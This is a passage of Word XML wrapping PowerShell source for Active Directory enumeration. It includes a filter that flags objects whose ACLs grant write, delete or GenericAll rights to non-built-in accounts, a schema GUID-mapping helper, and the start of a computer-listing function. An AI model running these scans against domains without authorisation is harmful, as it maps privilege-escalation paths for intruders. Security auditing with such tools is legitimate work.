        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F543D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61382821" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42686D74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B3BD175" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Get all domain ACLs with the appropriate parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DF58F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Get-ObjectACL @PSBoundParameters | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1363A417" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # add in the translated SID for the object identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709AC2F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $_ | Add-Member Noteproperty 'IdentitySID' ($_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C36ADC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B568F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    } | Where-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42886BBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # check for any ACLs with SIDs &gt; -1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0699878E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF202EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # TODO: change this to a regex for speedup?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4166AAEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [int]($_.IdentitySid.split("-")[-1]) -ge 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB7C008" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164EB166" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F85C43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    } | Where-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F857BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # filter for modifiable rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574B1952" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ($_.ActiveDirectoryRights -eq "GenericAll") -or ($_.ActiveDirectoryRights -match "Write") -or ($_.ActiveDirectoryRights -match "Create") -or ($_.ActiveDirectoryRights -match "Delete") -or (($_.ActiveDirectoryRights -match "ExtendedRight") -and ($_.AccessControlType -eq "Allow"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77173DF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B060FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76853E98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70BF3D02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7394763A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-GUIDMap {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21887CB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C246241" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADA03D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48D16F92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Helper to build a hash table of [GUID] -&gt; resolved names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B21D9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D26E741" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Heavily adapted from http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18826C93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5E8C1393" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED7D5E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7934ECA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to use for the query, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E67D3A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="702F99C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2BB86A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414EB936" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04242C74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7ACA1DD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E736FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F35742E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B6F49C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25D2CDBB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232B363C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4BCC5138" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7854BEBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662639FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="638B9D50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1EF04F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F5F645" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF57A61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D648F64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DDB2FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="15286E94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B26CF00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE0056C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F3CD294" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B676983" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19476FE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649BC16F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4658B017" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53684A5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $GUIDs = @{'00000000-0000-0000-0000-000000000000' = 'All'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F96364" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1466E778" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $SchemaPath = (Get-NetForest).schema.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACAAEE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5CA49242" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $SchemaSearcher = Get-DomainSearcher -ADSpath $SchemaPath -DomainController $DomainController -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308BCC9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($SchemaSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E356651" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SchemaSearcher.filter = "(schemaIDGUID=*)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A335F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5A77BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Results = $SchemaSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B03ED1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E669165" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # convert the GUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4B5BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GUIDs[(New-Object Guid (,$_.properties.schemaidguid[0])).Guid] = $_.properties.name[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241D2300" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD47CD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC5DC4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $SchemaSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A18FE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1961AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C46FB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Error in building GUID map: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFE2807" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57527400" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11390D94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="54CA979E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $RightsSearcher = Get-DomainSearcher -ADSpath $SchemaPath.replace("Schema","Extended-Rights") -DomainController $DomainController -PageSize $PageSize -Credential $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2772B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($RightsSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3368F362" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $RightsSearcher.filter = "(objectClass=controlAccessRight)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4DB7DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C937B25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Results = $RightsSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E7F676" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE6D34D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # convert the GUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4500EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GUIDs[$_.properties.rightsguid[0].toString()] = $_.properties.name[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1141304F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE7009F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F96E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $RightsSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121CC5CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DD37EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B7022B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Error in building GUID map: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB16B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480273CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21211761" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0D8A958B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $GUIDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1897BCE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1036C7BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2099144C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2BAC6667" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-NetComputer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE13924" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E59C4A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D981A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="074F8E62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function utilizes adsisearcher to query the current AD context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1215E73F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        for current computer objects. Based off of Carlos Perez's Audit.psm1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5524B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        script in Posh-SecMod (link below).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766E6F99" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05BC28D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E765A27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D6D528D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return computers with a specific name, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604B089" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1CF52BEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A2C066" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72BBBD5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return computers with a specific service principal name, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275C1DA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="13EA8888" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER OperatingSystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27847C5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="20A39CAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return computers with a specific operating system, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBE8F16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C840A99" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ServicePack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40974D9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0789B5E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return computers with a specific service pack, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4913993C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0FEA6F7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC3B5F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0228E7B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A customized ldap filter string to use, e.g. "(description=*admin*)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764D9A7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A2C8CCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Printers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A22415B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F321254" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return only printers.</w:t>
      </w:r>
    </w:p>
